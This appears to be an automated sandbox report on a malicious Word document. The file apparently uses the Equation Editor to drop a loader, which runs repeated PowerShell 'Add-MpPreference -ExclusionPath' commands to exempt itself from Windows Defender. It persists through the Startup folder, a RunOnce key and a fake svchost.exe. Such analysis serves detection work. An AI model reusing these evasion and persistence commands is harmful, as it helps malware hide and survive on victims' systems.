Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Allignright_companyprofile.docReversingLabs: Detection: 14%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknownProcess created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknown
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: Allignright_companyprofile.docStatic file information: File size 2960089 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2536.6001966ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000005.00000002.2117946573.00000000003F3000.00000004.00000020.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2772.6004244ion.pdb source: powershell.exe, 00000009.00000002.2119685464.000000000037A000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2124286114.0000000002AD0000.00000002.00000001.sdmp
Source: mad[1].exe.2.drStatic PE information: 0x84B8EC41 [Tue Jul 24 03:00:17 2040 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02863876 pushfd ; retf 0071h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0288117C push 71CB3989h; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_02BE0590 push edx; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_02BE0720 push esi; ret

Persistence and Installation Behavior:

barindex
Drops PE files with benign system namesShow sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeJump to dropped file
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: unknownExecutable created and started: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeJump to dropped file

Boot Survival:

barindex
Creates an autostart registry key pointing to binary in C:\WindowsShow sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Drops PE files to the startup folderShow sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
